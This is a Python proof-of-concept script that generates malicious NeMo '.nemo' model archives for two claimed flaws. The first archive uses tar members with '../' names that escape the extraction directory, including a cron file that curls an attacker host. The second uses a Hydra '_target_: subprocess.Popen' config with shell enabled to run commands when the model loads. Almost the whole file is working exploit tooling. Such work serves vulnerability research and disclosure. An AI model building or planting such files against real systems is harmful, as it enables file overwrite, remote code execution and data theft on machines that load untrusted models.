File size: 6,940 Bytes
20db0ae
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
"""

PoC: NeMo Path Traversal + Hydra _target_ Injection

=====================================================

Crafts malicious .nemo files demonstrating two vulnerabilities:



1. Path Traversal: tar.extract() in model_utils.py without _safe_extract()

2. Hydra Injection: _target_ field in config instantiates arbitrary classes



Usage:

    python craft_malicious_nemo.py                     # Generate both PoCs

    python craft_malicious_nemo.py --type traversal    # Path traversal only

    python craft_malicious_nemo.py --type hydra        # Hydra injection only

    python craft_malicious_nemo.py --verify            # Show archive contents



This is for authorized security research only.

"""

import tarfile
import io
import os
import argparse


def craft_path_traversal_nemo(output_path="path_traversal.nemo"):
    """Write a PoC ``.nemo`` tar archive whose member names contain ``..``.

    The archive is an uncompressed tar holding three members, in this order:
    a small ``model_config.yaml`` followed by two entries whose names begin
    with ``../../../../tmp/``. Once written, the archive is reopened and a
    summary (size, member names, explanatory note) is printed to stdout.

    NOTE(review): the statement that NeMo's ``model_utils`` extracts such
    entries without ``_safe_extract()`` is the PoC author's claim; it cannot
    be confirmed from this file.

    Args:
        output_path: Filesystem path of the archive to create.

    Returns:
        ``output_path``, unchanged.
    """
    # Ordinary-looking config entry. Per the PoC author it is what NeMo's
    # detect_prefix() looks for -- TODO confirm against NeMo itself.
    benign_config = b"""model:

  name: poc_path_traversal

  target: nemo_test

  class_path: nemo.collections.asr.models.EncDecCTCModel

"""

    # (member name, payload) pairs, written in exactly this order. The last
    # two names climb out of the extraction directory via "../" components.
    entries = [
        ("model_config.yaml", benign_config),
        (
            "../../../../tmp/nemo_poc_escaped.txt",
            b"PATH_TRAVERSAL_SUCCESSFUL - written outside extraction dir\n",
        ),
        (
            "../../../../tmp/nemo_poc_cron",
            b"# Malicious cron job\n* * * * * curl http://attacker.com/exfil\n",
        ),
    ]

    with tarfile.open(output_path, "w:") as archive:
        for entry_name, data in entries:
            header = tarfile.TarInfo(name=entry_name)
            header.size = len(data)
            archive.addfile(header, io.BytesIO(data))

    archive_bytes = os.path.getsize(output_path)
    print(f"[+] Path traversal .nemo written to: {output_path}")
    print(f"    Size: {archive_bytes} bytes")
    print()
    print("    Tar contents:")
    # Re-read the file from disk so the listing reflects what was stored.
    with tarfile.open(output_path, "r:") as archive:
        for entry_name in archive.getnames():
            marker = ""
            if ".." in entry_name:
                marker = " <-- PATH TRAVERSAL"
            print(f"      {entry_name}{marker}")
    print()
    for note in (
        "[!] When loaded by nemo.utils.model_utils.load_config():",
        "    tar.extract() has NO path validation (_safe_extract not used)",
        "    Files are written outside the temp extraction directory",
    ):
        print(note)
    return output_path


def craft_hydra_injection_nemo(output_path="hydra_injection.nemo"):
    """Write a PoC ``.nemo`` tar archive whose config carries a ``_target_`` key.

    The archive is an uncompressed tar with two members, in this order:
    ``model_config.yaml`` (its ``optim`` section names ``subprocess.Popen``
    as ``_target_``) and a 64-byte all-zero ``model_weights.ckpt``. Once
    written, the archive is reopened and a summary is printed to stdout.

    NOTE(review): the statement that NeMo's ``setup_optimization()`` feeds
    this section to ``hydra.utils.instantiate()`` is the PoC author's claim;
    it cannot be confirmed from this file.

    Args:
        output_path: Filesystem path of the archive to create.

    Returns:
        ``output_path``, unchanged.
    """
    # YAML config whose optimizer section names an arbitrary callable.
    crafted_config = b"""model:

  name: poc_hydra_injection

  target: nemo_test

  optim:

    _target_: subprocess.Popen

    args:

      - "echo HYDRA_TARGET_INJECTION_SUCCESSFUL"

    shell: true

  sched:

    name: CosineAnnealing

    warmup_steps: 100

"""

    # (member name, payload) pairs, written in exactly this order. The
    # zero-filled weights entry only makes the archive look like a real model.
    entries = [
        ("model_config.yaml", crafted_config),
        ("model_weights.ckpt", b"\x00" * 64),
    ]

    with tarfile.open(output_path, "w:") as archive:
        for entry_name, data in entries:
            header = tarfile.TarInfo(name=entry_name)
            header.size = len(data)
            archive.addfile(header, io.BytesIO(data))

    archive_bytes = os.path.getsize(output_path)
    print(f"[+] Hydra injection .nemo written to: {output_path}")
    print(f"    Size: {archive_bytes} bytes")
    print()
    print("    Tar contents:")
    # Re-read the file from disk so the listing reflects what was stored.
    with tarfile.open(output_path, "r:") as archive:
        for entry_name in archive.getnames():
            print(f"      {entry_name}")
    print()
    for excerpt_line in (
        "    Malicious config excerpt:",
        "      optim:",
        "        _target_: subprocess.Popen    <-- ARBITRARY CLASS INSTANTIATION",
        '        args: ["echo HYDRA_TARGET_INJECTION_SUCCESSFUL"]',
        "        shell: true",
    ):
        print(excerpt_line)
    print()
    for note in (
        "[!] When loaded by NeMo and setup_optimization() is called:",
        "    hydra.utils.instantiate({_target_: 'subprocess.Popen', ...})",
        "    -> Instantiates subprocess.Popen with attacker args -> RCE",
    ):
        print(note)
    return output_path


def main(argv=None):
    """Command-line entry point: build the requested PoC archives.

    Parses ``--type`` (``traversal``, ``hydra`` or ``both``), ``--verify``
    and ``--output-dir``, calls the matching ``craft_*`` function(s), and,
    when ``--verify`` is given, lists each generated archive's members plus
    the first ten lines of its ``model_config.yaml``.

    Args:
        argv: Optional list of argument strings. ``None`` (the default)
            makes argparse read the process command line.
    """
    parser = argparse.ArgumentParser(description="NeMo PoC generator")
    parser.add_argument("--type", choices=["traversal", "hydra", "both"],
                        default="both", help="Which PoC to generate")
    parser.add_argument("--verify", action="store_true",
                        help="Show archive contents after generation")
    parser.add_argument("--output-dir", default=".", help="Output directory")
    args = parser.parse_args(argv)

    # Create the output directory up front; otherwise tarfile.open() fails
    # with FileNotFoundError for a directory that does not exist yet. An
    # empty string means "current directory" to os.path.join, so skip it.
    if args.output_dir:
        os.makedirs(args.output_dir, exist_ok=True)

    # (selector, builder, file name) in the order the archives are produced.
    builders = (
        ("traversal", craft_path_traversal_nemo, "path_traversal.nemo"),
        ("hydra", craft_hydra_injection_nemo, "hydra_injection.nemo"),
    )

    paths = []
    for selector, build, filename in builders:
        if args.type in (selector, "both"):
            paths.append(build(os.path.join(args.output_dir, filename)))
            print()

    if not args.verify:
        return

    for path in paths:
        print(f"=== Verifying {path} ===")
        with tarfile.open(path, "r:") as tar:
            for member in tar.getmembers():
                print(f"  {member.name} ({member.size} bytes)")
                if member.name != "model_config.yaml":
                    continue
                extracted = tar.extractfile(member)
                if extracted is None:
                    # extractfile() returns None for non-regular members.
                    continue
                print("  Config preview:")
                # Close the member's file object once its text is read.
                with extracted:
                    preview = extracted.read().decode().split("\n")[:10]
                for line in preview:
                    print(f"    {line}")
        print()